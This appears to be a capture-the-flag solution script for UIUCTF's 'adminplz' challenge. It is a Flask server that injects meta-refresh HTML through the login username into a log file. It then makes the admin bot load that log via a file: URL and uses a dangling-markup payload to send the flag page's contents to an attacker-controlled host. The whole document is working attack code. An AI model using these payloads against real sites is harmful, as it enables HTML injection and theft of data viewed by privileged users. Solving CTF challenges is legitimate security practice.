from flask import *
import requests
from threading import Thread
from time import sleep
app = Flask(__name__)
## CONSTANTS
base_url = "http://local:80"
base_url = "https://inst-3c3b5cabbd99902e.adminplz.chal.uiuc.tf"
if base_url.endswith("/"):
base_url = base_url[:-1]
sess = requests.Session()
sess.verify = False
# == END CONSTANTS
def report(url):
print("reporting ->", url)
sess.post(f"{base_url}/report", data={"url": url})
def send(payload):
print(base_url, payload)
sess.post(f"{base_url}/login", data={"username": payload, "password": "x"})
sess.get(f"{base_url}/admin?view=file:/flag.html")
@app.route("/step0")
def step0():
payload0 = """
<meta http-equiv="refresh" content='8;URL=http://ip:9002/step1'>
"""
send(payload0)
report("http://127.0.0.1:8080/admin?view=file:/var/log/adminplz/latest.log")
return "reported, should come in 8s"
def close_markup():
sleep(10)
send("'>")
@app.route("/step1")
def step1():
url = "http://127.0.0.1:8080/admin?view=file:/flag.html"
# insert dangling markup
payload1 = """
<meta http-equiv="refresh" content='0;URL=http://ip:9000/redir?a=
"""
payload1 += "\n" * 1
send(payload1)
thread = Thread(target=close_markup)
thread.start()
print("thread in bg")
return redirect(url, code=302)
app.run("0.0.0.0", port=9002, debug=True)
instancer
Files:Tags: No tags.
